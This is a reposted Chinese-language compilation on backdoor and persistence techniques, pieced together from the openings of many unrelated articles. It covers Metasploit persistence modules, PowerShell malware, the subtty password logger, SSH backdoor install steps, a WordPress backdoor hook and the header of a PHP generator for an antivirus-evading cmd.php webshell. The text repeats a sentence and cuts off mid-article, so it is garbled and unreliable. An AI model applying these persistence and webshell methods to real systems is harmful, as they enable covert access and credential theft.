【转】Windows权限维持常用后门学习总结

MSF模块
Metasploit自带有权限维持相关后门,常用的有:通过服务启动(metsvc);通过启动项启动(persistence);通过计划任务(scheduleme&schtasksabuse)。
Metasploit自带有权限维持相关后门,常用的有:通过服务启动(metsvc);通过启动项启动(persistence);通过计划任务(scheduleme&schtasksabuse)。
常见的bash、脚本语言、计划任务、公钥、msf以及rootkit等就不详细介绍了,有些像suid、inetd比较久远的,虽然不常用,但是学习下也没啥坏处。
人在做,天在看。
技术从来都是中性的,被用来行善还是作恶完全取决于运用它的人。原子能可以用来发电为大众提供清洁能源,也可以用来制造能毁灭全人类的核武器,这不是一个完善的世界,于是我们既有核电站也有了核武器。
Powershell,曾经Windows系统管理员的称手工具,在恶意代码制造和传播者手里也被玩得花样百出。由于Powershell的可执行框架部分是系统的组件不可能被查杀,而驱动它的脚本是非PE的而非常难以通过静态方法判定恶意性,同时脚本可以非常小巧而在系统底层的支持下功能却可以非常强大,这使利用Powershell的恶意代码绕过常规的病毒防护对系统为所欲为。因此,360天眼实验室近期看到此类恶意代码泛滥成灾就毫不奇怪,事实上,我们甚至看到所跟踪的APT团伙也开始转向Powershell。
本文我们向大家展示一些看到的实际恶意代码的例子。
当我看了DM_牛发的http://zone.wooyun.org/content/20429,我的心情久久不能平静,这本应属于我的精华+WB,被他先发了,这娃真是可恶,可恨 :-),后来DM_牛又发了我一些资料让我学习,我就写了此文,刚入门,肯定有错误的地方,希望小伙伴们讨论,指出。
这次Labofapenetrationtester是以”week of powershell shell”的形式放出来的,就是每天一篇,一共五篇,分别是
在一个成功的测试后,通常会想让特权保持的更久些.留后门的工作就显得至关重要,通常布设的后门包括但不限于数据库权限,WEB权限,系统用户权限等等.此文则对大众后门隐藏的一些思路做科普.
一直在寻找一款能够记录SSH密码的工具,subtty这款工具能够记录su,sudo,SSH,gpg, cryptmount等,非常强大,只要是一个交互的终端即可。
该工具作者是Julien Tinnes,感谢这位大神,这里也分享给大家。
在作者博客下载的只有编译好的二进制程序(回头找他要源码),这里简单说一下使用方法,这个程序不需要root权限,但是很快就有root了。
可以有四种方式调用程序来记录密码:
grep (global search regular expression(RE) and print out the line,全面搜索正则表达式并把行打印出来)是一种强大的文本搜索工具,它能使用正则表达式搜索文本,并把匹配的行打印出来。Unix的grep家族包括grep、egrep和fgrep。
利用grep命令我们可以查找常见的漏洞、webshell和其他恶意文件。本文使用的grep版本为2.9,如果你使用一个低于2.5.4的grep,那本片文章中的一些命令可能无法正常工作。可以用grep -v或grep -version确定一下版本。你也可以使用grep –help查看更多信息。如下图:
ssh后门的设置与登入
1、mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old
2、mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old
3、下载并安装ssh后门:
是不是在很多场合听说过后门(Backdoor),特别是一些高科技的电影里面,那些系统或者程序的作者都会通过自己留下的后门来拯救世界 。其实程序的后门留我们根本不远,其实你用的很多软件或者程序都是有后门的,下面给大家演示的一个很简单的案例,就可以给 WordPress 站点留下后门,获取管理员权限,当然这只是一篇教学文章,个人强烈你在使用 WordPress 帮人作网站的时候,千万不要这样做。
<?php
add_action( 'wp_head', 'my_backdoor' );
转自:Return Blogs: www.creturn.com
代码:
<?php /* * PHP后门程序 * 使用说明:此程序默认会在当前目录下生成一句话cmd.php密码cmd * 不含有任何敏感函数有它也查不出来所以免杀是必然的。生成的一句 * 不是免杀的,要免杀原理已经能看到了,自行处理。 * 亲,使用的时候注意删除这里的注释~~ * BY: Return Data:2012.6.29 */